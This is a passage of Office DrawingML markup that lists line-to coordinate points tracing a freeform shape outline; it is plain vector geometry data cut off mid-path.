                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1037" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1318" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1276" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1275" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1398" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1462" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1502" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1492" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1476" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1340" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1054" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
